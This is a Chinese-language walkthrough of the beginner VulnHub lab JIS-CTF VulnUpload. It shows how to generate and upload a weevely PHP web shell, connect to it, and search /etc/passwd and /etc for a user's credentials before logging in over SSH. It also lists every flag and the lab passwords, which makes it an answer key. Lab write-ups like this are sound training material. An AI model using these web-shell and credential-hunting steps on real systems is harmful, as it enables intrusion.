vulnhub- JIS-CTF-VulnUpload-CTF01

测试环境~JIS-CTF:VulnUpload、Mac、kali

VM名称:JIS-CTF:VulnUpload
难度:初学者
说明:本机上有五个标志。尝试找到它们。查找所有标志平均需要1.5个小时。
下载(镜像)https://download.vulnhub.com/jisctf/JIS-CTF-VulnUpload-CTF01.ova
百度网盘~下载镜像
链接:https://pan.baidu.com/s/1m4Rt6zi6Q9ND7p_eqixdIA 
密码:bkj3

ps:此处有坑,在运行vm靶机环境的时候一直获取不到ip地址,报Failed to start Raise network interfaces当然前提是要登录靶机, 解决方法在下面

账号 technawi 
口令 3vilH@ksor
# 启用网卡
sudo ifconfig ens33 up
# 分配IP
sudo dhclient 

渗透过程

1、端口扫描

2、目录扫描

3、寻找flag

靶机地址为192.168.0.108,开放端口及服务:80 http、22 ssh。且发现web下存在robots.txt文件。于是,访问该地址80端口。

前期准备工作中,发现robots.txt文件,于是先访问。

一眼就看到了flag,先搞下来看看

The 1st flag is : {8734509128730458630012095}
第一个flag到手

继续寻找。。。。。出现not work ,什么鬼,查找网页源代码,第二个flag到手!

username : admin
password : 3v1l_H@ck3r
The 2nd flag is : {7412574125871236547895214}
第二个FLAG到手

顺便得到了账号密码,估计是后台的,试试登录下,果然成功。

一看就是文件上传,于是我们利用weevely来生成一个木马,进行上传。

weevely generate shell /home/harvey/桌面/shell.php

用kali的话,一样子的。

截屏2020-06-13 下午5.26.05.png

shell制作完成,上传!

上传完成,去看一下。先打开uploads页面试试,404.。。。那就是在uploaded_files里了。

果然,没有报错,继续查看shell

发现是可以访问的,没有404,说明可以访问我们的木马,紧接着我们连接我们的木马

weevely http://10.0.10.221/uploaded_files/shell.php shell

ls翻翻,在往上遍历看看。

第一反应,打开flag.txt。。。然而没有权限访问。。。接着打开hint.txt,惊喜的发现第三个flag!

The 3rd flag is : {7645110034526579012345670}
第三个FLAG到手

拿到第三个flag,同时也提示了下一步如何操作,英文翻译过来就是让我们去找technawi用户的密码然后读取flag.txt,这个东西在一个很隐蔽的地方,既然这个technawi是用户,那就看一下用户列表,technawi也在里面

cat /etc/passwd

接下来就是在etc文件中搜索这个包含technawi关键字的文件了,命令行输入:

grep -rns technawi /etc/

显眼的第三行,抓过来看看👀~哇哦,得到了第四个flag,以及账号密码

The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor
第四个FLAG到手

4、连接ssh(root提权)

拿到了账号密码,咱们提权(root)去。
输入  python -c ‘import pty;pty.spawn(“/bin/bash”)’
貌似不成功,但是22端口开放,于是ssh链接
ssh -p22 technawi@192.168.0.108
输入密码后成功登陆

最后,打开之前的flag.txt~至此第5个flag到手!

The 5th flag is : {5473215946785213456975249}
至此。5个flag全部寻找完成!

5、总结

做完这个靶机感觉并不难,主要是考验一些比较基本的知识以及灵活的运用。

上一篇
下一篇